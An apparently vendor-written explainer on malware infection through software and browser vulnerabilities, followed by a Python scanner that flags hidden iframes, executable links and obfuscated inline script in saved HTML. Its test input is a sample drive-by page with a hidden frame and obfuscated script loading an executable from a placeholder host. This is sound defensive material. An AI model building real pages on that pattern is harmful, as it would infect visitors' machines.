Malware Implementation Techniques
Cybercriminals often exploit any vulnerabilities that exist within the operating system (OS) or the application software that’s running on the victim’s computer – so a net worm or Trojan virus can penetrate the victim’s machine and launch itself.
What is a vulnerability?
A vulnerability is effectively an error in the code or the logic of operation within the OS or the application software. Because today’s OSs and applications are very complex and include a lot of functionality, it’s difficult for a vendor’s development team to create software that contains no errors.
Unfortunately, there’s no shortage of virus creators and cybercriminals that are ready to devote considerable effort to investigating how they can benefit from exploiting any vulnerability – before it’s fixed by the vendor issuing a software patch.
Typical vulnerabilities include:
- Application vulnerabilities
The Nimda and Aliz mail worms exploited Microsoft Outlook’s vulnerabilities. When the victim opened an infected message – or even placed their cursor on the message, in the preview window – the worm file launched.
- Operating system (OS) vulnerabilities
CodeRed, Sasser, Slammer and Lovesan (Blaster) are examples of worms that exploited vulnerabilities in the Windows OS – whereas the Ramen and Slapper worms penetrated computers via vulnerabilities in the Linux OS and some Linux applications.
Exploiting Internet browser vulnerabilities
Recently, the distribution of malicious code via web pages has become one of the most popular malware implementation techniques. An infected file and a script program – that exploit the browser’s vulnerability – are placed on a web page. When a user visits the page, the script program downloads the infected file onto the user’s computer – via the browser’s vulnerability – and then launches the file. In order to infect as many machines as possible, the malware creator will use a range of methods to attract victims to the web page:
- Sending spam messages that contain the address of the infected page
- Sending messages via IM systems
- Via search engines – whereby the text placed on an infected page is processed by search engines and the link to the page is then included in search result lists
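The drive-by pattern described above (a script on the page that fetches an executable and runs it, often loaded through a hidden frame) leaves traces in the page's HTML that a defender can triage statically. The following Python script is an added example, not code from the original article or from any vendor: it parses a saved page, flags hidden iframes, references to executable file types, and inline script that leans on the usual obfuscation helpers. The two sample pages, the `example.invalid` host and the list of executable extensions are constructed for the example; the checks are coarse heuristics meant to prioritise pages for analysis, not a malware detector.

```python
import re
from html.parser import HTMLParser

# Constructed sample pages (not taken from any real site). The second one mirrors
# the technique in the article: a hidden frame plus an obfuscated script that
# writes an executable into the page.
BENIGN_PAGE = """<html><body><h1>Weekly news</h1>
<script src="/static/app.js"></script>
<p>Nothing unusual here.</p></body></html>"""

SUSPICIOUS_PAGE = """<html><body><p>Loading...</p>
<iframe src="http://example.invalid/loader.html" width="0" height="0"></iframe>
<script>
var p = unescape("%75%72%6c"); eval(String.fromCharCode(100,111,99));
document.write('<object data="http://example.invalid/update.exe"></object>');
</script></body></html>"""

# File types a browser should never be asked to load from a web page (assumed list).
EXECUTABLE_EXT = (".exe", ".scr", ".pif", ".com", ".bat", ".cmd", ".msi", ".dll")


class _Collector(HTMLParser):
    """Collects iframe/script/object/embed tags and the text of inline scripts."""

    def __init__(self):
        super().__init__()
        self.tags = []            # (tag name, attribute dict)
        self.inline_script = []   # raw text found between <script> and </script>
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        attrs = {k.lower(): (v or "") for k, v in attrs}
        if tag in ("iframe", "script", "object", "embed"):
            self.tags.append((tag, attrs))
        if tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.inline_script.append(data)


def _is_hidden(attrs):
    """True if the element is sized to zero or hidden via inline style."""
    style = attrs.get("style", "").replace(" ", "").lower()
    return (attrs.get("width", "").strip() in ("0", "0px")
            or attrs.get("height", "").strip() in ("0", "0px")
            or "display:none" in style or "visibility:hidden" in style)


def scan_html(html):
    """Return a list of heuristic findings for a page; an empty list means nothing flagged."""
    c = _Collector()
    c.feed(html)
    findings = []
    for tag, attrs in c.tags:
        src = attrs.get("src") or attrs.get("data") or ""
        if tag == "iframe" and _is_hidden(attrs):
            findings.append(f"hidden iframe -> {src or '(no src)'}")
        if src.lower().split("?")[0].endswith(EXECUTABLE_EXT):
            findings.append(f"{tag} references executable {src}")
    script = "\n".join(c.inline_script)
    # Two or more of these helpers together is a common sign of packed or obfuscated script.
    obfuscation = [name for name in ("unescape(", "eval(", "fromCharCode", "document.write(")
                   if name in script]
    if len(obfuscation) >= 2:
        findings.append("inline script uses " + ", ".join(obfuscation))
    # URLs written from script do not appear as tags, so look for them in the script text.
    for url in re.findall(r"""https?://[^\s'"<>]+""", script):
        if url.lower().split("?")[0].endswith(EXECUTABLE_EXT):
            findings.append(f"inline script embeds executable URL {url}")
    return findings


if __name__ == "__main__":
    for name, page in (("benign", BENIGN_PAGE), ("suspicious", SUSPICIOUS_PAGE)):
        print(name, scan_html(page) or "no findings")
```

Run against a saved page, the script is a first-pass filter: a clean result proves nothing, since real pages usually fetch the exploit through further redirects and packed script, but any finding is a reason to pull the page's linked resources into a sandbox rather than a browser.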
Clearing the route for Trojan virus infections
Cybercriminals will also use small Trojans that are designed to download and launch larger Trojan viruses. The small Trojan virus will enter the user’s computer – for instance, via a vulnerability – and it will then download and install other malicious components from the Internet. Many of the Trojans will change the browser’s settings – to the browser’s least secure option – in order to make it easier for other Trojans to be downloaded.
Software developers and antivirus vendors respond to the challenge
Unfortunately, the period between the appearance of a new vulnerability and the start of its exploitation by worms and Trojan viruses tends to become shorter and shorter. This creates challenges for both software vendors and antivirus companies:
- The application or OS vendors have to rectify their mistake as soon as possible – by developing a software patch, testing it and distributing it to the users.
- Antivirus vendors must work rapidly – to release a solution that detects and blocks the files, network packets or whatever other item is used to exploit the vulnerability.